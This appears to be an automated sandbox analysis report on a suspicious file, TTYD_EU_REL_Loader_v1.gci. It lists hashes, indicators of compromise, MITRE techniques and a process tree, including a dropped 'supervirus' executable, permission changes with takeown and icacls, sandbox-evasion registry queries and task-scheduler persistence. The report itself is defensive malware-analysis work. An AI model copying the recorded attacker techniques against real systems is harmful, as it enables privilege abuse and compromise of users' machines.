1c34cd45dd2bb8c44a48d60aea5e0ce811ae416b220361c8e35e7411e8801379

Analysis

max time kernel
183s
max time network
273s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TTYD_EU_REL_Loader_v1.gci
Size

136KB
MD5

de2dec61ab3c2f8d3ba35ed96a60897f
SHA1

cc708aae99ec8c83b897161af36bd5a299abfd32
SHA256

1c34cd45dd2bb8c44a48d60aea5e0ce811ae416b220361c8e35e7411e8801379
SHA512

010d0343c84f149358d1122b77b8eab372a4434f4277ed08ba6029cdb2bacc882df60c1a5df594037b760b87b114f6b36e2ccd21201de08f731aa9eb74a8ef3b
SSDEEP

192:xFYFXLa0InoIhfsvx0hkaokwdHUCJ02+3T9kH1Avh1Avg:xaX20IZo6hkVHUlvG1Avh1Avg

Score

9^/10

discovery exploit

Malware Config

Signatures

Nirsoft 1 IoCs

Processes:

resource yara_rule

C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe Nirsoft
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

7056 takeown.exe
6244 icacls.exe
Executes dropped EXE 2 IoCs

Processes:

ridge.exeridge.exe

pid process

6884 ridge.exe
5584 ridge.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

7056 takeown.exe
6244 icacls.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

resource	yara_rule
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe	Nirsoft

pid	process
7056	takeown.exe
6244	icacls.exe

pid	process
6884	ridge.exe
5584	ridge.exe

pid	process
7056	takeown.exe
6244	icacls.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exeAcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

AcroRd32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 3 IoCs

Processes:

cmd.exeOpenWith.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\supervirus.zip:Zone.Identifier firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\supervirus.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

AcroRd32.exe

pid	process
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

4008 OpenWith.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

firefox.exeAUDIODG.EXEtakeown.exe

description	pid	process
Token: SeDebugPrivilege	3844	firefox.exe
Token: SeDebugPrivilege	3844	firefox.exe
Token: 33	5568	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5568	AUDIODG.EXE
Token: SeDebugPrivilege	3844	firefox.exe
Token: SeDebugPrivilege	3844	firefox.exe
Token: SeDebugPrivilege	3844	firefox.exe
Token: SeDebugPrivilege	3844	firefox.exe
Token: SeTakeOwnershipPrivilege	7056	takeown.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

3844 firefox.exe
3844 firefox.exe
3844 firefox.exe
3844 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

3844 firefox.exe
3844 firefox.exe
3844 firefox.exe

pid	process
3844	firefox.exe
3844	firefox.exe
3844	firefox.exe
3844	firefox.exe

pid	process
3844	firefox.exe
3844	firefox.exe
3844	firefox.exe

Suspicious use of SetWindowsHookEx 37 IoCs

Processes:

OpenWith.exeAcroRd32.exefirefox.exeFunkin.exeridge.exeridge.exe

pid	process
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4008	OpenWith.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
4604	AcroRd32.exe
3844	firefox.exe
4604	AcroRd32.exe
3844	firefox.exe
3844	firefox.exe
3844	firefox.exe
7344	Funkin.exe
7344	Funkin.exe
6884	ridge.exe
5584	ridge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

OpenWith.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4008 wrote to memory of 4604	4008	OpenWith.exe	AcroRd32.exe
PID 4008 wrote to memory of 4604	4008	OpenWith.exe	AcroRd32.exe
PID 4008 wrote to memory of 4604	4008	OpenWith.exe	AcroRd32.exe
PID 4604 wrote to memory of 3564	4604	AcroRd32.exe	RdrCEF.exe
PID 4604 wrote to memory of 3564	4604	AcroRd32.exe	RdrCEF.exe
PID 4604 wrote to memory of 3564	4604	AcroRd32.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 4108	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe
PID 3564 wrote to memory of 3756	3564	RdrCEF.exe	RdrCEF.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci
1⤵
- Modifies registry class
PID:4960

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4008

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci"
2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4604

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
3⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CFBCF1380BEE61173CB3F81F9CCC97E6 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:4108

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC299BA5F0D602EB9F0C28C9BD05A5D7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC299BA5F0D602EB9F0C28C9BD05A5D7 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
4⤵
PID:3756

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC6F5347C931E4D98644DB41A6D02116 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:2372

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A8577161FB3B664D37B7AE78449ABDDD --mojo-platform-channel-handle=2508 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:1456

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6F57F8761F126705BFBDF6946394E9C5 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:2596

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1388

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4356

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3844

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.0.1841194680\1606962271" -parentBuildID 20230214051806 -prefsHandle 1820 -prefMapHandle 1812 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6355d52e-16a8-454e-a7a8-db8ca837c226} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1900 1bf21105c58 gpu
3⤵
PID:4172

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.1.548472827\2008355691" -parentBuildID 20230214051806 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4613bd-254c-43d9-b950-c1ca3e2870fd} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 2468 1bf1448ab58 socket
3⤵
PID:3168

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.2.366773303\1635616079" -childID 1 -isForBrowser -prefsHandle 1584 -prefMapHandle 2812 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d61a0634-af18-4180-b145-d0bb8ee29f9a} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1564 1bf24116558 tab
3⤵
PID:884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.3.2077564674\1643910090" -childID 2 -isForBrowser -prefsHandle 4120 -prefMapHandle 4116 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33e58a01-72db-4920-883a-35dd84aaf152} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4132 1bf1447ab58 tab
3⤵
PID:4952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.4.1542839662\854563694" -childID 3 -isForBrowser -prefsHandle 4996 -prefMapHandle 5000 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3834455-c718-4a20-9608-360f071b5280} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4944 1bf27e4e858 tab
3⤵
PID:5392

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.5.1254738678\1327137358" -childID 4 -isForBrowser -prefsHandle 5148 -prefMapHandle 5152 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82e18c5d-98d9-47b1-a1fb-b3d3f2c607d6} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5136 1bf27e4fd58 tab
3⤵
PID:5400

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.6.1343550622\1985077459" -childID 5 -isForBrowser -prefsHandle 5372 -prefMapHandle 5316 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7888ef2d-afa5-4706-8664-af9fdb0f00e8} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5360 1bf27e50c58 tab
3⤵
PID:5408

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.7.2125030608\895906793" -childID 6 -isForBrowser -prefsHandle 4448 -prefMapHandle 4500 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22b542c-c83e-4eb4-85aa-4ca21dcf7bc0} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5908 1bf270d0258 tab
3⤵
PID:5252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.8.2104756379\1032501123" -parentBuildID 20230214051806 -prefsHandle 6120 -prefMapHandle 4420 -prefsLen 27776 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b846c4dc-42b0-4e9a-ba56-77eedcf8b919} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6136 1bf25dc6258 rdd
3⤵
PID:5356

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.9.515008306\2113160611" -childID 7 -isForBrowser -prefsHandle 10272 -prefMapHandle 10276 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd1fc8bb-075d-4af0-b35a-939006fe5a91} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1600 1bf2736c858 tab
3⤵
PID:212

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.10.1466635449\2027421123" -childID 8 -isForBrowser -prefsHandle 9916 -prefMapHandle 5544 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af3e4438-fa68-42ae-8c98-afb4cbe14be7} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9904 1bf2b17c958 tab
3⤵
PID:4672

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.11.536516322\904925067" -childID 9 -isForBrowser -prefsHandle 9788 -prefMapHandle 9780 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddd59ceb-8efb-4b53-9bfe-9db39097b11b} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9680 1bf2b73a558 tab
3⤵
PID:1360

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.12.514845600\2068559563" -childID 10 -isForBrowser -prefsHandle 9352 -prefMapHandle 9348 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78a917f1-ef6d-4119-8cb5-9510ee9519a3} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9364 1bf2b710b58 tab
3⤵
PID:2224

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.13.307730423\2101878358" -childID 11 -isForBrowser -prefsHandle 9204 -prefMapHandle 9200 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {354af93d-db46-44e5-94df-629960cfdb83} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9224 1bf2b710258 tab
3⤵
PID:5268

C:\Program Files\Mozilla Firefox\firefox.exe
